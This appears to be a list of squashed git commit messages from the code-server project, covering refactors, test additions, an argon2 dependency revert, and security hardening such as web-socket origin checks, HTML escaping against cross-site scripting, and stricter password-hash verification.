The tilde is ambiguous and it can be helpful to know exactly what paths
code-server is trying to use, especially if it is running as a different
user than you expected.
* Move splitOnFirstEquals to util
I will be making use of this to parse the forwarded header.
* Type splitOnFirstEquals with two items
Also add some test cases.
* Check origin header on web sockets
* Update changelog with origin check
* Fix web sockets not closing with error code
* refactor: fix type annotations in open
There was no clear reason as to why we needed to use type assertions
when initializing both `args` and `options` in `open` so I refactored
them both.
* refactor: create constructOpenOptions
* refactor: add urlSearch and remove options
* feat: add tests for constructOpenOptions
* revert: partial revert of 723469ab5bed3ba9fbb3e8d5ecbfcd9a3bee2d88
This reverts part of the changes introduced in refactor: migrate from argon2 ->
@node-rs/argon2 (#4733)
Switching to @node-rs/argon2 introduced bugs that we couldn't solve due to
limitations in npm.
see here
https://github.com/coder/code-server/issues/4804#issuecomment-1030338395
* chore(deps): replace argon2 w/@node-rs/argon2
* refactor: clean up hashPassword functions
* refactor(util): pass in process.platform
* fix: use correct settings for test-extension
Before, it was running into errors with an @types package.
Now, we're correctly running `tsc` so it picks up our `tsconfig.json` and we're
telling TypeScript to not typecheck our lib and exclude `node_modules`
CodeQL caught a path where we were passing in req.query.path
to pathToFsPath, which may not have been a string.
So we refactored some things to ensure we only pass it a string
which also let us change the parameter type to string
instead of string | string[].
There's a chance this function can be called with a path that is not a string.
To catch that, we check if path is of a different type and throw an error if it
is.
This also adds a couple tests for this function.
This can be used to escape any special characters in a string with HTML before
sending from the server back to the client. This is important to prevent a
cross-site scripting attack.
Previously, we used argon2 to verify the hash with the password.
If the hash didn't start with a $, then it would enter the catch block.
Now we check the hash before trying to verify it and we also throw an Error if
the verify fails.
This makes the isHashMatch function more robust.